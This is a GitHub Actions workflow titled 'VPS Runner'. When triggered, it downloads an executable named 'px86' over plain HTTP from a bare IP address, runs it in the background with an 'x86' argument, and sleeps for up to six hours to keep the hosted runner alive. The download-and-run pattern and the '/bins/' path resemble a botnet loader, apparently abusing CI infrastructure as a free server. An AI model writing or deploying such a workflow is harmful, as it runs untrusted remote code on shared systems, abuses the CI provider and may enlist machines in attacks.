name: VPS Runner

on:
  workflow_dispatch:
    inputs:
      uptime:
        description: 'VPS uptime in hours (max 6)'
        required: false
        default: '6'
        type: choice
        options:
          - '1'
          - '2'
          - '3'
          - '4'
          - '5'
          - '6'

jobs:
  run-binary:
    runs-on: ubuntu-latest

    steps:
    - name: Download binary
      run: |
        wget http://45.138.16.158/bins/px86 -O px86
        chmod +x px86

    - name: Run binary with keep-alive
      run: |
        UPTIME=${{ github.event.inputs.uptime }}
        echo "Running for $UPTIME hours"
        
        # Start binary in background
        ./px86 x86 &
        
        # Keep workflow alive with discrete sleep
        sleep $(($UPTIME * 3600))
        
        echo "Completed successfully"
